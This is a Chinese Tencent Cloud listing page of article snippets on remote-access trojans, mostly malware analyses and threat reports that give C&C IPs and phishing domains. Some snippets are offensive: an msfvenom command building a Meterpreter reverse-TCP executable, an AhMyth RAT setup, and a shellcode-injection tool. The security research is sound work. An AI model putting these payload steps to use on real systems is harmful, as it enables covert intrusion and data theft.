- 综合排序
- 最热优先
- 最新优先
- 来自专栏极安御信安全研究院
远控木马病毒分析
SHA256:880a402919ba4e896f6b4b2595ecb7c06c987b025af73494342584aaa84544a1
1.1K21编辑于 2023-08-24 - 来自专栏高性能服务器开发
大灰狼远控木马源码分析
本次小方给大家分析一下大灰狼远程控制木马的源码。 大灰狼远程控制木马是一个较为常见的远控工具,不同的木马病毒团伙对其定制改造后发布了诸多变种。 本章将从启动过程、通信协议、远控功能三个方面逆向分析该木马的实现原理。 16.5 远控功能分析 远控功能分析如代码清单 16-5 所示。 有了对大灰狼远控木马的分析,读者可以根据病毒的实现原理,编写对应的修复、防御工具,制作针对大灰狼远控木马的专杀软件。 本文摘编自《C++反汇编与逆向分析技术揭秘(第2版)》,经出版方授权发布。
7.5K40编辑于 2021-12-08 - 来自专栏信息安全必修课
使用kali msfvenom编写远控木马“实验”
windows/meterpreter/reverse_tcp LHOST=192.168.0.1LPORT=4444-f exe -o windows.exe 得到生成的名为windows.exe的木马程序 把生成的windows.exe木马文件拖放到windows靶机上,运行。 图片 本篇文章就到此结束了,注,本文章只能用于学习,生成的木马文件不得传播,传播后造成损失的将会按照法律依法处理。
2.6K51编辑于 2023-04-23 - 来自专栏FreeBuf
瞄准金融行业的远控木马:SpyNote
间谍软件是最常见的恶意软件之一,攻击者通过 Android 间谍软件来跟踪用户位置、检查 Web 浏览记录,甚至窃取敏感信息(密码和信用卡号等),其对银行机构与客户构成的威胁与 Android 银行木马相媲美 卓越的能力 SpyNote.C 恶意软件变种执行的独特功能,在 2022 年具有远控功能更的恶意软件中被识别出来。
2.4K30编辑于 2023-02-10 - 来自专栏kevin-blog
介绍一个安卓远控木马
今天就体验一下这款安卓远控木马 工具: java的运行环境 AhMyth Android RAT应用程序 我的系统:ubuntu18.04 安装: 方式一: 源代码编译: git clone https 危害 这个木马可以在免root的情况下不知不觉的远程打开受感染目标手机的摄像头,查看短信,录制麦克风,定位地址等一系列操作。 防御方式: 不管什么木马,都需要你点击运行,才会起效,所以不要下载第三方应用,切记切记。特别是各位女孩子!! 最后: 本博客只是出于教育目的,对于因使用此工具而造成的任何直接或间接损失,我概不负责。
16.5K10发布于 2018-09-18 - 来自专栏FreeBuf
“大黄蜂”远控挖矿木马分析与溯源
事件背景: 近日,腾讯安全反病毒实验室发现了一类远控木马具有爆发的趋势。 通过跟踪发现,此类木马不仅保留了远控的功能,而且随着虚拟货币价格的水涨船高,木马加入了挖矿的功能,用用户的机器来实现自己利益的最大化。 技术分析: 通过分析发现,该木马启动后,会释放多个可执行文件,我们按其 实现的不同的 功能,将这些可 执行程序,划分为远控模块、挖矿模块和清理模块三个模块,分别用于远程控制、虚拟货币挖矿以及删除清理文件以躲避查杀 远控模块 1. 888.exe运行后会从 资源里释放dll 文件,并命名为随机名。 通过对发送数据以及加密方式的分析,我们可以看出发送的数据和加密方式和Gh0st远控非常相似,可以认定其为Gh0st远控的变种: ?
2.6K70发布于 2018-03-01 - 来自专栏FreeBuf
远控盗号木马伪装成850Game作恶
前言 近期,360QVM团队捕获到一类在网上广泛传播的远控盗号木马,该木马伪装为正规棋牌游戏850Game的安装程序,在伪造的钓鱼网站(如:www.gam850.com)上挂马并诱骗用户下载。 伪造的850Game钓鱼网站 木马伪装 木马制作者将木马程序和游戏棋牌程序捆绑在一起进行传播,当用户开始安装后,程序除了在“C:\Program Files”下安装850棋牌游戏外,还会在C盘目录下创建一个隐藏文件夹 : 将植入远控木马的时间存到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FSkcia msmaowaw中的MarkTime ? 而从木马的主要行为来看,这些伪造棋牌游戏的木马都比较相似,猜测这批伪装成850棋牌游戏网站的站点背后的操作者很有可能是同一伙人。 传播方式 由分析可知,这一批木马程序都是通过伪装成棋牌游戏进程传播木马,现将这一批伪装成棋牌游戏的网站整理如下: ?
1.9K50发布于 2018-02-09 - 来自专栏FreeBuf
Nanocore等多个远控木马滥用公有云服务传播
从 2021 年 10 月 26 日开始,研究人员发现多个远控木马开始通过云服务进行投递传播。 感染链从带有恶意 ZIP 附件的钓鱼邮件开始,ZIP 文件中包含一个带有恶意程序的 ISO 镜像文件。 △ 感染链 攻击者使用的远控木马是 Netwire、Nanocore 和 AsyncRAT,并且利用免费动态 DNS 服务 DuckDNS 注册了多个恶意域名。 一些下载服务器运行的是 Apache 服务器: △ 开放目录 每个远控木马都根据配置文件连接对应的 C&C 服务器,IP 地址如下所示: 103.151.123.194 185.249.196.175
1.4K20编辑于 2022-02-24 - 来自专栏FreeBuf
反间谍之旅:首款安卓远控木马工具分析
近日研究员在Google Play上发现了首款基于AhMyth(安卓远控木马工具)的间谍软件。这款恶意软件名为RB Music,是一款为Balouchi音乐爱好者提供流媒体广播的应用程序。 二、间谍软件远控框架 客户端通过解析控制端发送的指令order执行获取联系人信息、短信信息、文件信息以及发送短信等不同操作并将收集的信息发送至控制端:http://ra****ch.com。 ? 图3-7 远控主体程序 解析指令order,当getString(order)==x0000cn时,获取联系人信息。 ? 图3-17 发送短信链接 四、AhMyth框架介绍 AhMyth是一款安卓远控木马工具。它有两个组件:一个是服务器端,一个是客户端。 ? 图3-20 AhMyth工具监听端口 通过控制台可以实施Camera、Location、contacts、SMS、Calls Logs等各种远控操作。 ?
2.9K00发布于 2019-10-10 - 来自专栏安恒网络空间安全讲武堂
一种 Au3 远控木马变种样本分析
一种 Au3 远控木马变种样本分析 0x01 Au3 简介 AutoIt3 (简称 Au3)是一种能够在Windows GUI 或 DOS 上实现一系列自动化任务的脚本语言,其语法类似BASIC。 可以认为,该新型木马变种的作者在原有的利用代码框架上,进行了增配和强化,使其完全具备远控木马的功能。 3.4 远控行为 得到 inject.dll 后,发现该模块为 C# 源码编写,用 dnSpy 载入分析发现,木马运行时,首先建立与远控服务器的心跳包连接,将受害者主机的基本信息回传到木马服务器。 此外,该远控木马客户端上线时,回传本机基础信息使用的是 BASE64 编码来加密流量.: ? 0x04 免杀思路总结 在自解压注释中,通过增加正常的小说文本来干扰杀软的识别。 根据第三方情报数据显示,该远控端 IP 早在 2016 年就被捕获过可疑行为: ? ?
2.9K70发布于 2018-02-06 - 来自专栏FreeBuf
虚假 CVE-2023-40477 PoC 传播远控木马
在分析了该虚假 PoC 脚本后,研究人员发现该脚本最终会安装 VenomRAT 远控木马。 一旦漏洞被公开披露,攻击者就会迅速采取行动。 如下所示,任务管理器中有一个名为 Windows.Gaming.Preview 的进程,该进程与后面介绍的 VenomRAT 远控木马同名。 可执行文件 Windows.Gaming.Preview.exe 是 VenomRAT 远控木马的变种,与前文介绍的任务管理器中的进程同名。 这表明,攻击者在制作视频时可能就已经在系统上运行 VenomRAT 远控木马了。 虚假 PoC 脚本中使用了 GeoServer 的漏洞 PoC,最终安装 VenomRAT 远控木马。
1.4K30编辑于 2023-10-06 - 来自专栏公共互联网反网络钓鱼(APCN)
“伪装微软通知”新型钓鱼攻击横行,黑客用“加密马甲”投放远控木马
攻击者通过伪造微软官方账户安全警告邮件,诱导用户下载所谓“安全补丁”或“授权复核文档”,实则在后台悄然部署远控木马(RAT)与信息窃取程序。 动态解密:真正的远控木马(如Remcos、AsyncRAT、AgentTesla等)并不会一开始就出现在内存中,而是在运行一段时间后,由加载器动态解密并注入到合法进程中,实现“无文件攻击”或“内存驻留” 远控木马上线,你的电脑成了“透明玻璃屋”一旦解包完成,真正的恶意载荷就会被释放。 他举例说,如果某企业发现内部多台设备都出现了使用UpCrypter打包的未知程序,即便尚未触发木马行为,也应视为高风险事件,立即开展排查。 黑客不再需要从零编写病毒,只需使用现成的打包工具,就能让老款木马“焕然一新”,轻松绕过防御。但这并不意味着我们束手无策。芦笛总结道:“攻防对抗的本质,是信息与反应速度的较量。
34510编辑于 2025-10-30 - 来自专栏FreeBuf
新型在野远控木马Woody RAT,针对俄罗斯航空航天组织
Malwarebytes 威胁情报团队发现了一种新的远控木马,命名为 Woody RAT,研究人员发现其在野已经存在至少一年。
1.8K30编辑于 2023-03-30 - 来自专栏FreeBuf
远控木马Posion Ivy开始肆虐缅甸和其它亚洲国家
臭名昭著的远程控制木马Poison Ivy(后面称作PIVY)最近开始重新露出水面。并且出现了一些新行为。过去一年,已经发现PIVY为了种种企图攻击了许多亚洲国家。
1.5K100发布于 2018-02-08 - 来自专栏音视频咖
5G远控创新与探索,超低时延的远控传输
本期我们邀请了腾讯云音视频专家工程师——白松灵,为大家分享5G远控技术创新探索以及腾讯云在超低延时传输上的技术实践。 5G是当前的新趋势。 在矿山、冶金、港口以及开放道路等场景中,通过5G远控技术可以将实际操作的安全员从车上解放出来,实现真正的无人,甚至可以实现一名驾驶员控制多台车辆,解放更多人力成本。 未来我们将持续拓展更多的5G远程实时控制场景,让远控技术可以造福更多的行业。同时,我们也会持续致力于不断提升远控相关的性能与指标并探索更多的方式来增强远控的操控体验。
2.9K30编辑于 2023-01-18 - 来自专栏FreeBuf
神话传奇:一款通过卖号在微信群传播的远控木马
近期,360安全卫士监测到了一批通过微信群传播的远控木马,木马针对在网上倒卖微信号的人群定向投放。 卖号人的交流群里时常有不同的小号在散播诱导性的木马程序,不知情的卖号人运行木马后,电脑上就被植入后门。 认识卖号人 在分析远控木马之前,我们先来认识一下这批远控木马的目标人群——卖号人。 我们尝试联系某个卖号的代理人,经过沟通后发现有人专门负责在微信群里散播诱导性的远控木马程序。 ? (二)、远控木马 KGGouWo.exe的图标伪装成私服的样式,实际上是个远控木马,当运行在非安装目录时,会显示传奇游戏的图片,来欺骗用户。 ? 心跳包每隔10秒钟就会发送一次,用于向控制服务器证明远控木马一直处于上线状态。 ?
1.7K40发布于 2018-07-30 LySocket 远程ShellCode种植远控
LySocket 是一款使用纯 WindowsAPI 实现的命令行版远程控制工具,该工具通过最少的代码实现了套接字的批量管理操作,用户可以指定对远程主机内特定进程注入ShellCode攻击载荷,只要对端LyClient客户端能一直运行,则Metasploit攻击载荷就可以很方便的注入到目标主机任意的进程内反弹。
1.3K20编辑于 2022-12-28- 来自专栏大侠之运维
轻量化的远控工具
在今天的数字化时代,远程控制工具变得越来越重要,无论是用于远程技术支持、服务器管理还是其他远程操作。natpass是一款轻量级的远程控制工具,它提供了强大的功能和安全性,使您能够轻松地远程管理您的计算机和服务器。本文将介绍natpass的功能、部署过程以及如何使用它,帮助您充分了解这个有用的工具。
66310编辑于 2024-10-09 - 来自专栏公共互联网反网络钓鱼(APCN)
伪装成“对账单”的远控木马:Coinbase钓鱼新套路暴露Windows端点安全盲区
根据卡巴斯基逆向分析,该RAT基于开源远控工具(如AsyncRAT或NanoCore)二次开发,具备以下能力:浏览器数据窃取:遍历Chrome、Edge、Firefox等主流浏览器的本地存储目录,提取保存的密码 例如:2024年,有攻击者伪造“支付宝年度账单”诱导用户下载“.scr”文件,实为远控木马;2025年初,某银行客户收到“征信报告查看”短信,点击后跳转至仿冒页面,要求“安装专用阅读器”,实则为信息窃取程序
13810编辑于 2026-01-18 - 来自专栏七夜安全博客
Ares:基于Python的BS远控
Ares远控 前言 本文介绍一个比较有意思的基于Python的远程控制工具Ares。 Ares远控采用B/S架构,基于Python2,Server端使用Flask进行开发,整体在浏览器就可以轻易操作。 第二节 优势与不足 这个使用Python开发的B/S远控,整体来说实现一个远控的基本功能。 pyinstaller带包成二进制文件 使用http协议进行交互,防火墙不会拦截 不足: 使用py2开发,不兼容py3 并发性差 循环采用http询问,效率低下,容易被发现 http数据域没有被加密,保密性差 打算对这个远控进行重写
1.9K30发布于 2018-06-26
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号